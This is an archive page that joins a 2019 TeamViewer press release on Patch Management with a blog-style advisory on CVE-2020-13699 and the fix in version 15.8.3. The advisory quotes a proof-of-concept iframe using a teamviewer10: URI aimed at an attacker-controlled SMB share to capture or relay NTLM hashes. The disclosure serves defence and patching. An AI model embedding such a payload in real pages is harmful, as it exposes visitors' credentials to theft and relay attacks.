TeamViewer Patch Archives

Tampa Bay, Dec. 05, 2019 (GLOBE NEWSWIRE) -- TeamViewer, a global leader in secure remote connectivity solutions, today announced the availability of Patch Management, as part of TeamViewer’s Monitoring & Asset Management product.

“Keeping IT systems up to date is critical, as neglect or outdated software can lead to significant vulnerabilities, making room for cyber attackers”, says Dr. Mike Eissele, Chief Technology Officer at TeamViewer. “Patch Management is our integrated solution for SMBs and Enterprises, which enables our users to easily detect and patch vulnerable, outdated software. This has been a much-requested feature from our customers and we are happy to finally be able to offer it.”

Depending on the size of the company, the types of devices in use and the geographic distribution of the employees that use them, managing the patch management of an entire IT infrastructure can be quite a challenge. Especially when all it takes is one unpatched device to put the entire IT infrastructure at risk. With Patch Management by TeamViewer, it is now much easier to keep IT systems up to date and safe by automatically evaluating, testing, and applying patches to operating systems and even 3^rd party applications - no matter how large or geographically dispersed a company is. From now on, users can not only detect outdated software versions with TeamViewer, but can easily take action and roll out a necessary patch in no time. With Patch Management, users will never miss an update again.

The key benefits of Patch Management with TeamViewer are:

• Vulnerability detection: Patch Management detects vulnerabilities by automatically scanning for outdated software and operating system versions, providing users with a more in-depth insight into their IT infrastructure thereby increasing proactive intervention, well before incidents might occur.
• Patch deployment: With Patch Management, users can remotely deploy patches for 3^rd party applications and operating systems. They also have the possibility to automate this process via their patch management policies.
• TeamViewer integration: Since Patch Management is fully integrated into TeamViewer, users can roll out their patch management solution to their entire network effortlessly with just a few clicks, through the TeamViewer Management Console.

Patch Management by TeamViewer includes the following features:

• Windows & 3^rd party application updates: Users can keep devices running Windows up to date by managing, monitoring and deploying updates for Windows as well as hundreds of 3^rd party applications centrally and automatically.
• Intuitive interface & easy roll-out: Users can see all the different status updates of their devices and all available patches from one convenient location. Fully integrated into TeamViewer, patches can be deployed remotely with the click of a button.
• Automation & custom policies: In addition to the automatic vulnerability detection, users can set up Patch Management to also patch software and operating systems automatically. By defining individual patching policies, users can accommodate the needs of end-users, entire company departments or different customers.

Furthermore, Patch Management is part of TeamViewers Monitoring & Asset Management product, which provides users with the additional benefits of:

• Proactive device monitoring: Monitor crucial system aspects such as online state, disk health, CPU usage and more. Users can set individual monitoring policies for these parameters and get notifications to prevent problems from happening.
• Network device detection and monitoring: Monitor the availability and fault of all network devices such as printers, routers & switches by scanning for all connected devices to help reduce undesired downtimes and provide a stable work environment.
• Increased IT system visibility: Users can keep track of all deployed assets and gain valuable insight into their IT infrastructure by gathering important device information such as internal and external IP addresses, the hardware in use, as well as installed software.

To learn more about the features and benefits of Patch Management, please visit https://www.teamviewer.com/patch.

About TeamViewer

As a leading global provider of remote connectivity solutions, TeamViewer empowers users to connect anything, anywhere, anytime. The company offers secure remote access, support, control, and collaboration capabilities for online endpoints of any kind. By innovating with cutting-edge yet easy-to-deploy Augmented Reality (AR) and Internet of Things (IoT) implementations, the company enables businesses of all sizes to tap into their full digital potential. TeamViewer has been activated on more than 2 billion devices; more than 45 million devices are online at any time. Founded in 2005 in Goppingen, Germany, the company employs about 800 people in offices across Europe, the United States, and Asia Pacific. For more information, go to www.teamviewer.com and follow us on social media. 

[German]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.

The vulnerability CVE-2020-13699

Vulnerability CVE-2020-13699 affected the TeamViewer Desktop for Windows up to version 15.8.2, which does not correctly quote its custom URI handlers. A malicious website could start TeamViewer with arbitrary parameters, such as:

teamviewer10: –play URL

This allowed an attacker to force a victim to send an NTLM authentication request and either forward the request or capture the hash for offline password cracking. The discoverer of the vulnerability describes it here as follows.

An attacker could embed a malicious iframe in a website with a crafted URL:

<iframe src=”teamviewer10: –play \\attacker-IP\share\fake.tvs”>

that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).

This could be used in Watering Hole attacks to connect unnoticed, as you can read here. Not even a password is required. However, so far there is no indication that the vulnerability is being exploited. 

Update to TeamViewer version 15.8.3

With Bleeping Computer I noticed here that there was an update of TeamViewer to version 15.8.3 which closes the vulnerability. However, the vendor announced the update in this community post about 2 weeks ago. 

Statement on CVE 2020-13699

Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.

We implemented some improvements in URI handling relating to CVE 2020-13699.

The changes can be found in the changelog.